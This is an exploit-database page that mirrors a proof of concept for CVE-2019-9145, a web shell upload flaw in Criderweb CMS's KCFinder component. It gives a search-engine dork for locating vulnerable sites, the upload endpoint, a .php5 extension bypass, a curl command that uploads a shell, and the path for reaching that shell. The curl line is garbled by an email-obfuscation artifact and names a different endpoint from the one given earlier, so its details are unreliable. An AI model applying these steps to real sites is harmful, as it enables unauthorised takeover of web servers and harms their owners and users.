Advertisement






Cms Criderweb Shell Upload Vulnerability

CVE Category Price Severity
CVE-2019-9145 CWE-434 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2018-12-06
CPE
cpe:cpe:/a:criderweb:cms
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 0.00462 0.10535

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018120053

Below is a copy:

Cms Criderweb Shell Upload Vulnerability
Cms Criderweb Shell Upload Vulnerability
Tested On : Ubuntu 18.04
Author : security007
Dork : intext:"Copyright   Criderweb"
Exploit : /kcfinder/upload.php
Access Shell Page : /userfiles/files/[yourshell.php5]
Bypass extension required : .php5

Poc :
1. dorking on search engines
2. Enter the exploit, for example --> http://vuln.com/kcfinder/upload.php
3. if the pop up "unknown error" means vuln
4. open your terminal type -> curl -F "[email protected]" http://vuln.com/kcfinder.php
5. Access your shell on -> http://vuln.com/userfiles/files/shell.php5

GREETS:
Allah, Problem Cyber Team, Indonesian People

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum